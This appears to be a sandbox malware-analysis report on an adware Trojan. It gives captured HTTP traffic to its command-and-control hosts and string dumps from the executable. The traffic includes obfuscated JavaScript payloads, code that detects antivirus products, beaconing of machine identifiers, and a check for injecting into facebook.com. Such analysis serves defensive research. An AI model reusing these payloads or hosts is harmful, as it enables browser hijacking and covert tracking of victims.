    if (typeof setup2 === 'function') { setup2('MWY2NzQzNTk0YjQzNDExMDAzMDQxNDM4MTExNTQ5NTk0MzVhMWYwNDEwMWQ1OTU2NDQxNzAyMGExMDE1MTA0MDE3MTgwNzA2MGQwYzU5MTMwYjAwNGMxMzE4NGMwMDEwNTg0MzViMTkwYTFkNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzMyMjgzMDI4MmQzZDJlMjczYzJiMjIzMjNiMjQyNzI2MzQ0NTBkMTkxYTE1NTkzMjNjM2EzOTJjMzAyYjI1MzkyMDI4MzEyNjJhMzMzMzI3MzkzMTI5MjgzYzI2NGQwYTA3NDUyODJmMjczZjJjMmEzODMxMmEzYzMyMjIzYjJjMzMyOTM0MmEyNzI3Mjg1NjExMWUwNjBiNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzNlM2UzNzM5MjIzNTI3MjYzMTI3MjIyMzIxM2YzYzMwMmYzYzNjNWE1YjdhNDQ0ZDQzNTk0OTBiMTcwYzA3MDMzMTFmMGY1YjUxNDM0MTEwMDMwNDE0MWU1OTU2NDQxNzAyMGExMDE1MTA0MDE3MTgwNzA2MGQwYzU5MTMwYjAwNGMxMzE4NGMwMDEwNTg0MzViMTkwYTFkNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzMyMjgzMDI4MmQzZDJlMjczYzJiMjIzMjNiMjQyNzI2MzQ0NTBkMTkxYTE1NTkzMjNjM2EzOTJjMzAyYjI1MzkyMDI4MzEyNjJhMzMzMzI3MzkzMTI5MjgzYzI2NGQwYTA3NDUyODJmMjczZjJjMmEzODMxMmEzYzMyMjIzYjJjMzMyOTM0MmEyNzI3Mjg1NjExMWUwNjBiNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzNlM2UzNzM5MjIzNTI3MjYzMTI3MjIyMzIxM2YzYzMwMmYzYzNjNWE1YjdhNDQ0ZDQzNTk0OTEzMGYwZDEwMTkwYTI0MDc1YjUxNDM1MDRiNGU3YTE5', 'dmcykccxwp'); }....

    GET /plugins/mins/220.js?ver=46&rnd=8467 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:28 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1433161463"

    Last-Modified: Mon, 01 Jun 2015 12:24:23 GMT

    Cache-Control: max-age=900

    Content-Length: 40450

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422148.dop015.fr7.t,1456422148.cds007.fr7.c

    if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(f){var i=(function(){var z={"\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64":1,"\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64":2,"\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64":4,"\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64":8,"\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64":16,"\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64":32,"\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64":64,"\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64":128,"\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64":256,"\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64":512,"\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64":1024,"\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64":2048,"\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64":4096,"\x73\x70\x61\x72\x6B\x5F\x62\x61\x69\x64\x75\x5F\x64\x65\x74\x65\x63\x74\x65\x64":8192,"\x62\x32\x63\x5F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x5F\x64\x65\x74\x65\x63\x74\x65\x64":16384,"\x63\x72\x6F\x73\x73\x72\x69\x64\x65\x72\x5F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x5F\x64\x65\x74\x65\x63\x74\x65\x64":32768,"\x79\x6F\x6E\x74\x6F\x6F\x5F\x64\x65\x74\x65\x63\x74\x65\x64":65536,"\x61\x76\x67\x5F\x73\x61\x66\x65\x67\x75\x61\x72\x64\x5F\x64\x65\x74\x65\x63\x74\x65\x64":131072,"\x67\x65\x65\x6B\x5F\x62\x75\

    <<< skipped >>>

    GET /plugins/mins/180.js?ver=20&rnd=8467 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:28 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1450608507"

    Last-Modified: Sun, 20 Dec 2015 10:48:27 GMT

    Cache-Control: max-age=125

    Content-Length: 1407

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422148.dop015.fr7.t,1456422148.cds027.fr7.c

    if (typeof setup2 === 'function') { setup2('MTY2MDcxNDQwMTBlMTkwMjM3MTQwMTQ4NDI0NjRiMTIxOTA2MTI1YzQyNDUxOTQ4MWExNDAyMDUxMjBhMGMwNDFkMTU0NzE5MDIxZjRkMDc0MzFhMTAxNjU2NGM1ZjQ0MTAwMzBiNTg0NTM5MzYzOTNmM2QzMTM1M2YyMzNjMjMzYjI1MjgyYTM2MjMyMzJlM2QyMjM2MjkzODMwM2QyZjI5MzUyNzQwNWY0ODViM2MwMzBiMDg1NzI3MzkyYTI4MjIyMTMxMzQyNDJlM2QzNDM2M2IzZDIyM2QyODJjMjczZDM5MzY1YzViNDA1NDE0MDgwYzRiNWIzNjI1MmUyMDJkMzUzZTM4MzEyMjJjMjgzMjI3MzEyMzNmMzUzMTIyMzYyNTRiNDQ1MDUwMWYwZjFlNTc1NDRjNWU0NTUwNTAwYjVkNGI1MTVhNGQ1ZjQ0NWI1MDU5NWM0ZDUxNWI1YzE5MTcwYjAyNTAzNTI3MjUzYjM1M2UyMTMwMmYyOTJmMmEzOTI4MmEzZDJkMmIyMjMyMzU1ZTEyMWMxMzA5NGYzZDM5MmUzODM3MzUzYTI4MjQzNjI3MzQzMjIzMzYzNTNkM2IyMTNlMjczNDMyM2YyYjIzM2IyNTI0MzYzZDM5NGY0NjcyNmY0YjEyMTkwNjEyMTUzODE4MTQ0NDUzNWE0ZjFhMTYxMjFkMTk0MjQ5NDYxYjQzMDEwYzA5MWExYTE0MDcwNzFmMWU1YzAxMDkwMDQ1MTk0ODE5MTIxZDRkNTQ1NDViMTgxZDAwNWI0NzMyMmQyMTM0MjIzOTJiMzQyMDNlMjgyMDNkMjMzNTNlM2QyODJkM2YyOTJkMzEzMzJmMzUzMTIyMzYyNTRiNDQ1MDUwMjMwYjE1MDM1NDI1MzIzMTMwMjkzZTM5MmEyZjJkM2YzZjJkMjMzNjNkMzUzNjI3MjQzZjMyMmQ0NDUwNWY1YzBhMDMwZjQ5NTAyZDNkMjUzZjI1MmIzNTNiMzMyOTM3MzAzOTM4MzkzZDM0MzYzMzI5MmQzZDQwNWI1ODRlMTQwYzFjNWM0ZjU0NTU1YTU4NGUwMDVlNDk1YTQxNTU1NDViNTM0ZTUyNWY0ZjVhNDA0NDEyMDgwMzFjNWIzNjI1MmUyMDJkMzUzZTM4MzEyMjJjMjgzMjMzMzIzNjMyMjMzYzM5MzY1YzE5MDcwYjAyNTAzNTI3MjUzYjM1M2UyMTMwMmYyOTJmMmEzOTIwMzQzZTI2MjMyYTIxMmYyYTM5M2MyOTI4MjAzZDJmMjkzNTI3NDQ0NTcwNjQ1MDEyMGExODBkMTEwODIwMWU0ZjQ4NDI1NzU1NWE3MjFi', 'mjxfizmrbf'); }....

    <<< skipped >>>

    GET /plugins/mins/91.js?ver=186&rnd=8467 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:28 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1451210071"

    Last-Modified: Sun, 27 Dec 2015 09:54:31 GMT

    Cache-Control: max-age=441

    Content-Length: 188421

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422148.dop015.fr7.t,1456422148.cds012.fr7.c

    (function(M){window.__loaderIsRunning__=false;var A=[].slice;var z={};var a=function(at){if(typeof at=="string"&&typeof at.trim=="function"){return at.trim();}return at==null?"":at.toString().replace(/^\s /,"").replace(/\s $/,"");};function f(at){var au=z[at]={},av,aw;at=at.split(/\s /);for(av=0,aw=at.length;av<aw;av ){au[at[av]]=true;}return au;}var H=function(at,au){var aw=[];for(var av=0;av<at.length;av ){if(av in at){var ax=au(at[av],av,at);if(ax!=null){aw.push(ax);}}}return aw;};var ad=function(aw,az,av){var au,ax=0,ay=aw.length,at=ay===undefined||appAPI.utils.isFunction(aw);if(av){if(at){for(au in aw){if(az.apply(aw[au],av)===false){break;}}}else{for(;ax<ay;){if(az.apply(aw[ax ],av)===false){break;}}}}else{if(at){for(au in aw){if(az.call(aw[au],au,aw[au])===false){break;}}}else{for(;ax<ay;){if(az.call(aw[ax],ax,aw[ax ])===false){break;}}}}return aw;};var J=function(av){av=av?(z[av]||f(av)):{};var aA=[],aB=[],aw,ax,au,ay,az,aD=function(aE){var aF,aI,aH,aG,aJ;for(aF=0,aI=aE.length;aF<aI;aF ){aH=aE[aF];aG=appAPI.utils.isArray(aH)?"array":(appAPI.utils.isFunction(aH)?"function":"");if(aG==="array"){aD(aH);}else{if(aG==="function"){if(!av.unique||!aC.has(aH)){aA.push(aH);}}}}},at=function(aF,aE){aE=aE||[];aw=!av.memory||[aF,aE];ax=true;az=au||0;au=0;ay=aA.length;for(;aA&&az<ay;az ){if(aA[az].apply(aF,aE)===false&&av.stopOnFalse){aw=true;break;}}ax=false;if(aA){if(!av.once){if(aB&&aB.length){aw=aB.shift();aC.fireWith(aw[0],aw[1]);}}else{if(aw===true){aC.disable();}else{aA=[];}}}},aC={add

    <<< skipped >>>

    GET /plugins/mins/253.js?ver=2&rnd=8467 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newcloudrack.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:29 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1417718237"

    Last-Modified: Thu, 04 Dec 2014 18:37:17 GMT

    Cache-Control: max-age=900

    Content-Length: 735

    Content-Type: application/x-javascript; charset=UTF-8

    X-HW: 1456422149.dop015.fr7.t,1456422149.cds049.fr7.c

    if (typeof setup2 === 'function') { setup2('MGU2MDdmNDgwNTEyMTUxYjM0MTgxOTQ4NGM0YTRmMzkzZTI4MzMzNTIwM2EzMjJiMzkyMzNlMjMyZTM5MjEzNTI5NDUwZjBmNGUwYTRmMDAwNjQ4NWE2MDY0NDQxMTA3MTQwZDFjMDQzZjBlNGY1YzQxNTk1NDU5NTk2MDdmNDgwNDA4MGQwMjBmMGYzZjM5NTQ1MDRkNDQxNjAyMGYwZTFhMWQ1ODM1MzIwNDA4MzQxMTAzMGQwZjFhMzUxODE0MGQzNDNlNGE0ODRhNTEzNTMyMjUzMzM0MzIzZTM0M2UyNTM1MjUyOTMyM2YzZTM1NWEwODFmNDQwYTBmMDc1NDAyMGIxODFhMTcwMzBhMDg1YzM0M2UyOTI3MjUyNTM5M2YyZjI1MmUzMzM1MzYyYjNiM2EzMjJmMjUzNDNlNGMxNzE4MTkxZDFlMDMxMzU2M2UzNTM2MzgzOTM5M2UzNDI4MmYyNDM4MmEyODI0MjUzYTM1MjQzOTNlMzU1MzA4MWYwOTUwMzkzZTI4MzMyNTI2MzkyNDIzMjkyMzMzMzQzNDM5MzAzODI5MjMyOTM5M2U0ZDEzMDQxMTU3NTE0YTQ2NDY0OTA1MDQxZDU1MmUxNzFlMDg0ZTQ4NDI0ZjBkMTAxZTIyMDMwMDAzNDk0MjVhNDg3ZjE3', 'ujvjmfakaj'); }..

    GET /monetization.gif?event=3&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&browser=ie,de,te,tc&rnd=1456422014 HTTP/1.1

    Host: logs.newdemoonlinecloud.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:15 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1389114507"

    Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

    Cache-Control: max-age=86400

    Content-Length: 35

    Content-Type: image/gif

    X-HW: 1456422135.dop003.fr7.t,1456422135.cds050.fr7.c

    GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Thu, 25 Feb 2016 17:42:15 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1456422135.dop003.fr7.t,1456422135.cds050.fr7.c..GIF89a.............,...........D..;..

    GET /ThawteTimestampingCA.crl HTTP/1.1

    Accept: */*

    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

    Host: crl.thawte.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    Pragma: no-cache

    HTTP/1.1 200 OK

    Server: Apache

    ETag: "ed105ad04f9762dff775f597758fe83a:1450503189"

    Last-Modified: Sat, 19 Dec 2015 05:15:01 GMT

    Date: Thu, 25 Feb 2016 17:42:19 GMT

    Content-Length: 341

    Connection: keep-alive

    Content-Type: application/pkix-crl

    0..Q0..0...*.H........0..1.0...U....ZA1.0...U....Western Cape1.0...U....Durbanville1.0...U....Thawte1.0...U....Thawte Certification1.0...U....Thawte Timestamping CA..151217000000Z..160331235959Z0...*.H..............X...;J..b. ..>..P.T....u.^q;C..*8.....*!3......tZ<.Z......-....T...........>E2.....'s.ij.GL.........h.NNb.8.G..$.. u.7.....22.HTTP/1.1 200 OK..Server: Apache..ETag: "ed105ad04f9762dff775f597758fe83a:1450503189"..Last-Modified: Sat, 19 Dec 2015 05:15:01 GMT..Date: Thu, 25 Feb 2016 17:42:19 GMT..Content-Length: 341..Connection: keep-alive..Content-Type: application/pkix-crl..0..Q0..0...*.H........0..1.0...U....ZA1.0...U....Western Cape1.0...U....Durbanville1.0...U....Thawte1.0...U....Thawte Certification1.0...U....Thawte Timestamping CA..151217000000Z..160331235959Z0...*.H..............X...;J..b. ..>..P.T....u.^q;C..*8.....*!3......tZ<.Z......-....T...........>E2.....'s.ij.GL.........h.NNb.8.G..$.. u.7.....22...

    GET /tss-ca-g2.crl HTTP/1.1

    Accept: */*

    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

    Host: ts-crl.ws.symantec.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    Pragma: no-cache

    HTTP/1.1 200 OK

    Server: Apache

    ETag: "564b9f6a1d7f5e7549d605d810a7bf38:1456392807"

    Last-Modified: Thu, 25 Feb 2016 09:01:25 GMT

    Date: Thu, 25 Feb 2016 17:42:19 GMT

    Content-Length: 477

    Connection: keep-alive

    Content-Type: application/pkix-crl

    0...0.....0...*.H........0^1.0...U....US1.0...U....Symantec Corporation100...U...'Symantec Time Stamping Services CA - G2..160225090125Z..160306090125Z.00.0...U.#..0..._..n\..t...}.?..L...0...U........0...*.H.................A...X..1[...=/.G.j..1....,..8k...n.9.....@!....w.:..-....I.o.2.J...R.O".G....#...J..d7(.TZ.V._......H{.i...a..R&...6.@...ERM.w...a..N...O..g..6...)...r..z......o<...q...D....T.|.....?Ju....M..)S.............N...*....kh...<.\>7...:(!z.#....W...2..A.^.C.HTTP/1.1 200 OK..Server: Apache..ETag: "564b9f6a1d7f5e7549d605d810a7bf38:1456392807"..Last-Modified: Thu, 25 Feb 2016 09:01:25 GMT..Date: Thu, 25 Feb 2016 17:42:19 GMT..Content-Length: 477..Connection: keep-alive..Content-Type: application/pkix-crl..0...0.....0...*.H........0^1.0...U....US1.0...U....Symantec Corporation100...U...'Symantec Time Stamping Services CA - G2..160225090125Z..160306090125Z.00.0...U.#..0..._..n\..t...}.?..L...0...U........0...*.H.................A...X..1[...=/.G.j..1....,..8k...n.9.....@!....w.:..-....I.o.2.J...R.O".G....#...J..d7(.TZ.V._......H{.i...a..R&...6.@...ERM.w...a..N...O..g..6...)...r..z......o<...q...D....T.|.....?Ju....M..)S.............N...*....kh...<.\>7...:(!z.#....W...2..A.^.C...

    GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1

    Accept: */*

    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

    Host: VVV.download.windowsupdate.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    Pragma: no-cache

    HTTP/1.1 200 OK

    Cache-Control: max-age=604800

    Content-Type: text/plain

    Last-Modified: Thu, 28 Jan 2016 17:51:53 GMT

    Accept-Ranges: bytes

    ETag: "80823092f459d11:0"

    Server: Microsoft-IIS/7.5

    X-Powered-By: ASP.NET

    Content-Length: 18

    Date: Thu, 25 Feb 2016 17:42:19 GMT

    Connection: keep-alive

    X-CCC: UA

    X-CID: 2

    1401D159F4929680B9....

    GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1

    Accept: */*

    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

    Host: VVV.download.windowsupdate.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    Pragma: no-cache

    HTTP/1.1 200 OK

    Cache-Control: max-age=604800

    Content-Type: application/octet-stream

    Last-Modified: Thu, 28 Jan 2016 18:43:43 GMT

    Accept-Ranges: bytes

    ETag: "80d9e4cffb59d11:0"

    Server: Microsoft-IIS/7.5

    X-Powered-By: ASP.NET

    Content-Length: 49661

    Date: Thu, 25 Feb 2016 17:42:19 GMT

    Connection: keep-alive

    X-CCC: UA

    X-CID: 2

    MSCF............,...................I.......d.........<H.T .authroot.stl. ..-.8..CK...<Tk........./.........Z..e..P..D.&.BRTH...E..E.b.["$qS)....-...[..}.o~g...q...Y...n...........aF\!.lI.4..0..ef.W.....C`....Y..F.D5...Y.A....1.|..c.1...Nc.Y..x..D...NP[FX...O.s@.aN.....'.B......."(~3z-.@~..|}(.......g4.p.........h.n.dQz..t.V.......;.....Q...d/../.pJ...6....E...A.@..]..T9..28..,..p...).....P:}.K...]=.7X.f..9..yB.P....uP$$...Q.u..y..".=......7...........#.X..P.8....>U....v.[.$.e...H.@~..........ea`.3...tLX...].-....<.........v.....M../..z6.t^.....p....M...v(CP%F.......!eX..a...-..G.....S%..l.....Y..(.*.-....C.L0...G.....).rm8...(7.T{.Q...."...B`H.....3..9..-..Vv.5Q.e.W.../...RY.v.P. .........l......8'.&z......3.;:...U4.."....yu... .."....d .e/7.;.XD*tn%$.........];..fY.R...7.....o.=xh...]..4...\.:...v....t..9 .nO.i}.T../(uke..p.&.6.E#.=b...@.R.P...*.s....h......(/.s.%.3g...:*X.].7.IE....E,.w.8......v...r4.qOh}~..E.5t...l...(*..2....`..F..".a:.t....9...W.kO?5..=..HhYrI.Sf..[:...3..2..)DB...;......(...B.......U(...._F./#.k@....9c.Y..G'..]...p..;M_o..~.3?.}.1M.5.f5)._......t _.6...l..K....OsY.0......H...^..\$P;U....8..)...1........J...uE..#n.......h.......17.P=,P.....}z.&..../..a.........p@.|KB..o.E..|..o.mr......m=.(v.:.i....@..I..w>4y....P........F...&... ....r$d..{B...)..A.`..x4E'~`V.."..(..(./G...@_Q`.....O...~`..~...x..KN~....Dko/A{..!...W..G,`)...*...#......q`..H.........%m..G....5..4.....?.......F...{.%..2....l.L....."...Y........ ...].\........... D..Y...!1..*.....M?..G..A.|Ex......~...s.!.=..

    <<< skipped >>>

    GET /monetization.gif?rand=15720&event=7&agent_type=2&ibic=8D4C23D6A4134239976F389726A57621IE&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201 HTTP/1.1

    User-Agent: Google Update/1.3.25.0;winhttp

    X-Last-HR: 0x0

    X-Last-HTTP-Status-Code: 0

    X-Retry-Count: 0

    Host: logs.newdemoonlinecloud.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    Pragma: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:23 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1389114507"

    Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

    Cache-Control: max-age=86400

    Content-Length: 35

    Content-Type: image/gif

    X-HW: 1456422143.dop003.fr7.t,1456422143.cds050.fr7.c

    GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Thu, 25 Feb 2016 17:42:23 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1456422143.dop003.fr7.t,1456422143.cds050.fr7.c..GIF89a.............,...........D..;..

    GET /UTN-USERFirst-Object.crl HTTP/1.1

    Accept: */*

    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

    Host: crl.usertrust.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    Pragma: no-cache

    HTTP/1.1 200 OK

    Server: nginx

    Date: Thu, 25 Feb 2016 17:42:22 GMT

    Content-Type: application/x-pkcs7-crl

    Content-Length: 75577

    Last-Modified: Wed, 24 Feb 2016 21:00:01 GMT

    Connection: close

    ETag: "56ce19d1-12739"

    X-CCACDN-Mirror-ID: h6edcacrl7

    Cache-Control: max-age=3600

    Accept-Ranges: bytes

    0..'40..&....0...*.H........0..1.0...U....US1.0...U....UT1.0...U....Salt Lake City1.0...U....The USERTRUST Network1!0...U....hXXp://VVV.usertrust.com1.0...U....UTN-USERFirst-Object..160224210001Z..160228210001Z0..%.0"....2EY..aU..........050525083740Z0".....Iv...h ..ys.....050525090148Z0!..u.......|..xk.0...050602000000Z0".....6.z..........7..050602075356Z0"....!.$.KM(C@="..o}..050603153950Z0".......W%Ny.vD.q..Y..050607084159Z0".......3W]...$.#\F4..050613095931Z0!......(.62..2PLr.q..050630164737Z0"....BLA......)..5....050707141212Z0!..Wa........q#......050711082844Z0!.._j.....o...'...m..050715130339Z0!..?........N]B..Z...050721083234Z0!..RO.)@..Q...p._....050726090436Z0".....k......1.g......050729091017Z0"....l........o... ...050729134103Z0"....v.R..~...?.(..&..050803165854Z0!..6..;....sC.M.s:...050809135135Z0!...........^nH.U.(..050810132024Z0"......;.S...wU-K.c...050810211644Z0"......d..#IE..#|.g#..050811182050Z0"....!..|....]rR..-r..050817085053Z0"......Ai..xJ..q]Xi...050822140450Z0!..>...........t'6...050824025640Z0!..?3..rd5>ocV.. ....050824075512Z0"....|..5u[.}<..[.@...050908092147Z0!..GJ.C...<NM.i......050912092806Z0!....(.8....U.1.'....050912144650Z0!..*.(ECy.V.?x.3S_k..050915103419Z0!......./.....L...r..050919144257Z0!..Y....=....#.......050929000000Z0!..p.,.g.x..z:q~.....050930114111Z0"....-.."...\w...~....050930123007Z0!....o0........P.H...051004084832Z0".......=6......4.....051005122403Z0!..md\\...~.v.o......051013100954Z0!...6.D...hR..BO._...051013110610Z0!..5.x.1..6.p~}>.....0510181

    <<< skipped >>>

    Map

    The Trojan connects to the servers at the folowing location(s):

    Strings from Dumps

    0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe_3000:

    .text

    .text

    `.rdata

    `.rdata

    @.data

    @.data

    .rsrc

    .rsrc

    tCPjB

    tCPjB

    8%u(j

    8%u(j

    RegOpenKeyTransactedW

    RegOpenKeyTransactedW

    RegCreateKeyTransactedW

    RegCreateKeyTransactedW

    RegDeleteKeyTransactedW

    RegDeleteKeyTransactedW

    1.2.1

    1.2.1

    Invalid HTTP(S) status code

    Invalid HTTP(S) status code

    InternetCrackUrlW

    InternetCrackUrlW

    urlRedirected

    urlRedirected

    HttpQueryInfoW

    HttpQueryInfoW

    this module doesn't support file request

    this module doesn't support file request

    InternetCrackUrl Failed

    InternetCrackUrl Failed

    port

    port

    HttpOpenRequest Failed

    HttpOpenRequest Failed

    HttpSendRequest Failed with:

    HttpSendRequest Failed with:

    HttpQueryInfo Failed

    HttpQueryInfo Failed

    HttpQueryInfoA

    HttpQueryInfoA

    requestUrl

    requestUrl

    redirectUrl

    redirectUrl

    httpCode

    httpCode

    %d %d

    %d %d

    Mozilla\Mozilla Firefox

    Mozilla\Mozilla Firefox

    9%D,3

    9%D,3

    1.1.1.2

    1.1.1.2

    inflate 1.2.7 Copyright 1995-2012 Mark Adler

    inflate 1.2.7 Copyright 1995-2012 Mark Adler

    function not supported

    function not supported

    operation canceled

    operation canceled

    address_family_not_supported

    address_family_not_supported

    operation_in_progress

    operation_in_progress

    operation_not_supported

    operation_not_supported

    protocol_not_supported

    protocol_not_supported

    operation_would_block

    operation_would_block

    address family not supported

    address family not supported

    broken pipe

    broken pipe

    inappropriate io control operation

    inappropriate io control operation

    not supported

    not supported

    operation in progress

    operation in progress

    operation not permitted

    operation not permitted

    operation not supported

    operation not supported

    operation would block

    operation would block

    protocol not supported

    protocol not supported

    GetProcessWindowStation

    GetProcessWindowStation

    operator

    operator

    VERSION.dll

    VERSION.dll

    HttpOpenRequestW

    HttpOpenRequestW

    HttpSendRequestW

    HttpSendRequestW

    WININET.dll

    WININET.dll

    GetProcessHeap

    GetProcessHeap

    PeekNamedPipe

    PeekNamedPipe

    KERNEL32.dll

    KERNEL32.dll

    USER32.dll

    USER32.dll

    GDI32.dll

    GDI32.dll

    RegCloseKey

    RegCloseKey

    RegCreateKeyExW

    RegCreateKeyExW

    RegDeleteKeyW

    RegDeleteKeyW

    RegEnumKeyExW

    RegEnumKeyExW

    RegOpenKeyExW

    RegOpenKeyExW

    RegQueryInfoKeyW

    RegQueryInfoKeyW

    ADVAPI32.dll

    ADVAPI32.dll

    ShellExecuteExW

    ShellExecuteExW

    SHELL32.dll

    SHELL32.dll

    ole32.dll

    ole32.dll

    OLEAUT32.dll

    OLEAUT32.dll

    UrlEscapeW

    UrlEscapeW

    SHLWAPI.dll

    SHLWAPI.dll

    COMCTL32.dll

    COMCTL32.dll

    GetCPInfo

    GetCPInfo

    .?AVCAgentExe@@

    .?AVCAgentExe@@

    zcÁ

    zcÁ

    {A#ND$chromever=

    {A#ND$chromever=

    Advapi32.dll

    Advapi32.dll

    Chrome-Profiles

    Chrome-Profiles

    Firefox\Profiles

    Firefox\Profiles

    ie-error.gif

    ie-error.gif

    Wininet.dll

    Wininet.dll

    hXXps://

    hXXps://

    kernel32.dll

    kernel32.dll

    iexplore.exe

    iexplore.exe

    %d.%d.%d.%d

    %d.%d.%d.%d

    SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe

    SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe

    Google\Chrome\Application\chrome.exe

    Google\Chrome\Application\chrome.exe

    Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

    Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

    Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

    Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

    Software\Mozilla\Mozilla Firefox

    Software\Mozilla\Mozilla Firefox

    SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

    SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

    Mozilla Firefox\firefox.exe

    Mozilla Firefox\firefox.exe

    %d.%d (%d)

    %d.%d (%d)

    SOFTWARE\Microsoft\Windows NT\CurrentVersion

    SOFTWARE\Microsoft\Windows NT\CurrentVersion

    \0x%x

    \0x%x

    HKEY_CLASSES_ROOT

    HKEY_CLASSES_ROOT

    HKEY_CURRENT_USER

    HKEY_CURRENT_USER

    HKEY_LOCAL_MACHINE

    HKEY_LOCAL_MACHINE

    HKEY_USERS

    HKEY_USERS

    HKEY_PERFORMANCE_DATA

    HKEY_PERFORMANCE_DATA

    HKEY_DYN_DATA

    HKEY_DYN_DATA

    HKEY_CURRENT_CONFIG

    HKEY_CURRENT_CONFIG

    @crtorpedoie

    @crtorpedoie

    if (document && document.location && typeof document.location.host == 'string' && document.location.host.indexOf('facebook.com') >= 0 && 194 !== PLUGIN_ID_PLACEHOLDER){

    if (document && document.location && typeof document.location.host == 'string' && document.location.host.indexOf('facebook.com') >= 0 && 194 !== PLUGIN_ID_PLACEHOLDER){

